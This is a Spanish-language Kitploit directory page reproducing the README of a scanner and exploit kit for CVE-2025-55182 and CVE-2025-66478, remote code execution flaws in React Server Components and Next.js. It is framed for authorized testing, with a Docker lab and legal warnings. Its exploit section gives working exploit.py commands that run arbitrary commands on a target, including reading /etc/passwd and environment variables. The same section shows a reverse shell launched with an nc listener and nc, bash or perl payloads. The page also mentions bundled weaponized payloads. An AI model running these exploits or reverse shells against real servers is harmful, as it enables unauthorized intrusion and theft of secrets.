Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
react2shell-scanner-CVE-2025-55182 — React2shell-web-scanner | Kitploit
Herramientas/GitHubGitHub/security-phoenix-demo/react2shell-scanner-cve-2025-55182
Gestión de Indicadores de Compromiso (IOC)Escáneres de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebInteligencia de AmenazasEnumeración de SubdominiosAprendizaje y EducaciónDesarrollo de PayloadsLabs y Práctica

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
GitHubsecurity-phoenix-demo/react2shell-scanner-cve-2025-55182

react2shell-scanner-CVE-2025-55182

React2shell-web-scanner

Ver Repositorio
25hace 8 mesesAún no revisado
Compartir

Escáner Enterprise React2Shell

Escáner de vulnerabilidades de alta fidelidad para CVE-2025-55182 y CVE-2025-66478 - Vulnerabilidades de ejecución remota de código en React Server Components / Next.js.

📖 Para un análisis técnico detallado, mecánicas de explotación y datos IOC, consulte SECURITY-RESEARCH.md


⚠️ AVISO LEGAL

Esta herramienta se proporciona SOLO con fines EDUCATIVOS y de PRUEBAS DE SEGURIDAD AUTORIZADAS. El acceso no autorizado a sistemas informáticos es ilegal. Utilice estas herramientas únicamente en sistemas que sean de su propiedad o para los que tenga permiso explícito por escrito. Los autores no asumen ninguna responsabilidad por el uso indebido.


🚨 Resumen de Vulnerabilidades

CVEDescripciónCVSS
CVE-2025-55182Deserialización insegura RCE en React Server Components9.8 Crítico
CVE-2025-66478RCE en Next.js Server Actions9.8 Crítico

Paquetes afectados:

  • react-server-dom-webpack: 19.0.0, 19.1.0, 19.1.1, 19.2.0
  • react-server-dom-turbopack: 19.0.0, 19.1.0, 19.1.1, 19.2.0
  • react-server-dom-parcel: 19.1.0, 19.1.1, 19.2.0

Versiones corregidas:

  • 19.0.1, 19.1.2, 19.2.1 (para todos los paquetes)

✨ Características

  • Entrada multi-objetivo: URL única, archivos de hosts, rangos CIDR, rangos de IP
  • Enumeración de subdominios: Descubrimiento automático de subdominios
  • Huella tecnológica: Detecta Next.js antes de probar
  • Modo de detección seguro: Detección por canal lateral sin ejecución de código
  • Verificación RCE: Prueba de concepto basada en aritmética
  • Correlación IOC: Comprobación contra infraestructura maliciosa conocida
  • Integración con Phoenix Security: Carga de hallazgos a la plataforma Phoenix
  • Escaneo concurrente: Multi-hilo para escalar

📦 Instalación

Con uv (recomendado)

root@kitploit:~
# No se requiere instalación - uv gestiona las dependencias
uv run react2shell-scanner -u https://example.com

Con pip

root@kitploit:~
pip install requests tqdm dnspython
python3 react2shell-scanner -u https://example.com

🚀 Uso

Escaneo Básico

root@kitploit:~
# URL única
python3 react2shell-scanner -u https://example.com

# Modo seguro (sin ejecución de RCE)
python3 react2shell-scanner -u https://example.com --safe-check

# Desde archivo de hosts
python3 react2shell-scanner -l targets.txt -t 50 -o results.json

# Rango CIDR
python3 react2shell-scanner --cidr 192.168.1.0/24 --ports 80,443,3000

# Múltiples rangos CIDR
python3 react2shell-scanner --cidr 10.0.0.0/24 --cidr 172.16.0.0/24

Escaneo Avanzado

root@kitploit:~
# Enumeración de subdominios
python3 react2shell-scanner -u example.com --enumerate-subdomains

# Lista de palabras personalizada para subdominios
python3 react2shell-scanner -u example.com --enumerate-subdomains \
    --subdomain-wordlist "app,api,admin,portal,staging"

# Rutas personalizadas
python3 react2shell-scanner -u https://example.com \
    --path / --path /_next --path /api

# Omitir huella tecnológica (escaneo de todo)
python3 react2shell-scanner -l targets.txt --skip-fingerprint --force-scan

# Verboso con SSL deshabilitado
python3 react2shell-scanner -u https://example.com -k -v

Integración con Phoenix Security

root@kitploit:~
# Cargar hallazgos a Phoenix
python3 react2shell-scanner -l targets.txt \
    --upload-phoenix \
    --phoenix-config .phoenix.config

# Modo depuración (guardar payloads)
python3 react2shell-scanner -l targets.txt \
    --upload-phoenix \
    --debug

# Cargar todos los resultados (no solo vulnerabilidades)
python3 react2shell-scanner -l targets.txt \
    --upload-phoenix \
    --all-results

🔧 Configuración

Configuración de Phoenix Security

Cree .phoenix.config:

root@kitploit:~
[phoenix]
client_id = your_client_id_here
client_secret = your_client_secret_here
api_base_url = https://api.demo.appsecphx.io
assessment_name = React2Shell Scanner - Web Vulnerabilities
import_type = new

O use variables de entorno:

root@kitploit:~
export PHOENIX_CLIENT_ID=your_client_id
export PHOENIX_CLIENT_SECRET=your_client_secret
export PHOENIX_API_URL=https://api.demo.appsecphx.io
export PHOENIX_ASSESSMENT_NAME="React2Shell Scanner"

🧪 Laboratorio de Pruebas

Se incluye un entorno de pruebas basado en Docker. Consulte Lab-instructions-sample.md como referencia rápida.

root@kitploit:~
# Iniciar laboratorio
cd test-lab/lab
docker-compose up -d

# Servicios:
# - Vulnerable: http://localhost:3011
# - Parcheado:  http://localhost:3012

# Probar instancia vulnerable (recopilación segura de evidencia)
python3 react2shell-scanner -u http://localhost:3011 -o evidence.json -e

# Probar instancia parcheada
python3 react2shell-scanner -u http://localhost:3012 -o evidence.json -e

# Ejecutar demostración completa
./test-and-demo.sh --full-demo

⚠️ Nota: Los comandos de explotación (p. ej., exploit.py -c "whoami") desencadenan RCE REAL. Úselos únicamente en contenedores Docker locales con fines de investigación.

💻 Herramienta de Explotación (exploit.py)

Ejecuta comandos en objetivos vulnerables. Requiere Python 3.11+

Instalación

root@kitploit:~
cd test-lab
pip3.11 install -r requirements.txt
# O: pip3.11 install rich-click fake-useragent rich requests

Ejemplos de Ejecución de Comandos

root@kitploit:~
# Ejecución básica de comandos
python3.11 exploit.py -u http://localhost:3011 -c "whoami"
# Salida: nextjs

python3.11 exploit.py -u http://localhost:3011 -c "id"
# Salida: uid=1001(nextjs) gid=65533(nogroup) groups=65533(nogroup)

python3.11 exploit.py -u http://localhost:3011 -c "hostname"
# Salida: 99e28775bf80 (ID del contenedor)

# Enumeración del sistema
python3.11 exploit.py -u http://localhost:3011 -c "uname -a"
python3.11 exploit.py -u http://localhost:3011 -c "cat /etc/passwd"
python3.11 exploit.py -u http://localhost:3011 -c "env | head -20"

# Reconocimiento de la aplicación
python3.11 exploit.py -u http://localhost:3011 -c "pwd"
# Salida: /app

python3.11 exploit.py -u http://localhost:3011 -c "ls -la"
python3.11 exploit.py -u http://localhost:3011 -c "cat package.json"
python3.11 exploit.py -u http://localhost:3011 -c "node --version"

# Información de red
python3.11 exploit.py -u http://localhost:3011 -c "cat /etc/hosts"
python3.11 exploit.py -u http://localhost:3011 -c "netstat -an | head -20"

# Enumeración de procesos
python3.11 exploit.py -u http://localhost:3011 -c "ps aux"

Reverse Shell (Avanzado)

root@kitploit:~
# Obtener la puerta de enlace de la red Docker
GATEWAY=$(docker network inspect lab_react-rsc-lab --format '{{range .IPAM.Config}}{{.Gateway}}{{end}}')

# Iniciar listener (en otra terminal)
nc -lvnp 4444

# Lanzar reverse shell
python3.11 exploit.py -u http://localhost:3011 -r -l $GATEWAY -p 4444 -P nc-mkfifo

# Tipos de payload disponibles: nc, nc-mkfifo, sh, bash, perl

Opciones de Exploit

OpciónDescripción
-u, --urlURL objetivo (obligatoria)
-c, --cmdComando a ejecutar
-r, --reverseHabilita el modo reverse shell
-l, --lhostHost del listener para reverse shell
-p, --lportPuerto del listener para reverse shell
-P, --payloadTipo de payload: nc, nc-mkfifo, sh, bash, perl
--timeoutTiempo de espera de la solicitud (por defecto: 10s)

📊 Formatos de Salida

Salida en Consola

root@kitploit:~
[VULNERABLE] https://vulnerable.example.com
    Estado: 307
    Detección: rce_arithmetic_check

[COINCIDENCIA IOC] 93.123.109.247
    La IP 93.123.109.247 coincide con infraestructura maliciosa conocida

[NEXTJS] https://safe.example.com v15.0.0

[NO VULNERABLE] https://other.example.com

Salida JSON

root@kitploit:~
{
  "scan_time": "2025-12-08T10:00:00Z",
  "scanner": "React2Shell Scanner v2.0",
  "cves": ["CVE-2025-55182", "CVE-2025-66478"],
  "total_scanned": 100,
  "vulnerable_count": 3,
  "ioc_matches": 1,
  "results": [
    {
      "target": "https://vulnerable.example.com",
      "ip": "203.0.113.50",
      "fqdn": "vulnerable.example.com",
      "verdict": "VULNERABLE",
      "vulnerable": true,
      "nextjs_detected": true,
      "detection_method": "rce_arithmetic_check"
    }
  ]
}

🔍 Correlación IOC

El escáner incluye Indicadores de Compromiso conocidos de campañas de explotación activas:

  • 32 IP maliciosas de payloads-exploits/iocs.csv
  • Payloads armados de payloads-exploits/weaponized-payloads
  • IOC extendidos que incluyen dominios, URL, hashes de archivos y carteras de criptomonedas en payloads-exploits/iocs_patterns.csv

Las coincidencias IOC detectadas se marcan con severidad alta.

Archivos IOC

ArchivoContenido
iocs.csv32 IP maliciosas conocidas con datos de geolocalización
iocs_patterns.csvIOC extendidos: dominios C2, URL de droppers, hashes de malware, carteras Monero
weaponized-payloadsPayloads de ataque del mundo real observados en explotación activa
exploit-2025-55182Formato de solicitud HTTP cruda para el exploit

🛡️ Métodos de Detección

Comprobación Segura por Canal Lateral (--safe-check)

  • Envía un payload malformado que provoca una respuesta de error
  • Sin ejecución de código en el objetivo
  • Detecta si el objetivo tiene deserialización vulnerable
  • Recomendado para reconocimiento pasivo

Comprobación Aritmética RCE (por defecto)

  • Envía un payload que ejecuta echo $((41*271))
  • Verifica que la respuesta contiene el resultado calculado (11111)
  • Confirma la capacidad real de ejecución de código
  • Úselo únicamente en objetivos autorizados

📁 Estructura del Proyecto

root@kitploit:~
react2shell-scanner-CVE-2025-55182/
├── react2shell-scanner          # Script principal del escáner
├── cve-2025-66478-web-scan     # Referencia original del escáner
├── nuclei-rules                 # Plantilla Nuclei
├── test-and-demo.sh            # Automatización de pruebas
├── README.md                    # Este archivo
├── SECURITY-RESEARCH.md         # Análisis técnico detallado
├── Lab-instructions-sample.md   # Guía rápida de pruebas de laboratorio
├── payloads-exploits/
│   ├── iocs.csv                 # IP maliciosas conocidas
│   ├── iocs_patterns.csv        # IOC extendidos (dominios, URL, hashes)
│   ├── weaponized-payloads      # Payloads de ataque del mundo real
│   └── exploit-2025-55182       # Solicitud HTTP cruda del exploit
└── test-lab/
    ├── exploit.py               # Herramienta de explotación
    ├── lab/
    │   ├── docker-compose.yml
    │   ├── vulnerable/          # Aplicación Next.js vulnerable
    │   └── patched/             # Aplicación Next.js parcheada
    └── packages/
        ├── vulnerable/          # Paquetes npm vulnerables
        └── patched/             # Paquetes npm parcheados

🔗 Repositorios Relacionados

RepositorioPropósito
react2shell-scanner-CVE-2025-55182Laboratorios, escáner y exploits (este repositorio)
react2shell-scanner-rce-react-nextEscáner completo con interfaz web

⚠️ Aviso Legal

Esta herramienta se proporciona únicamente para pruebas de seguridad autorizadas. Debe tener permiso explícito por escrito antes de escanear cualquier objetivo. El escaneo no autorizado puede violar las leyes de delitos informáticos.

Úsela de forma responsable:

  • Escanee únicamente sistemas que sean de su propiedad o para los que tenga autorización de prueba
  • Documente su autorización
  • Reporte las vulnerabilidades a través de los canales adecuados
  • Siga las prácticas de divulgación responsable

📚 Referencias

  • Aviso CVE-2025-55182
  • Blog de Seguridad de React
  • Aviso de Seguridad de Next.js GHSA-9qr9-h5gf-34mp
  • Registro de cambios de Vercel
  • Investigación de Assetnote

🙏 Créditos

  • Equipo de Investigación de Seguridad de Assetnote - Investigación original de la vulnerabilidad
  • Chocapikk - Desarrollo del exploit
  • Phoenix Security - Integración con la plataforma

Presentado por investigadores de seguridad que trabajan para hacer la web más segura.

Descargar herramienta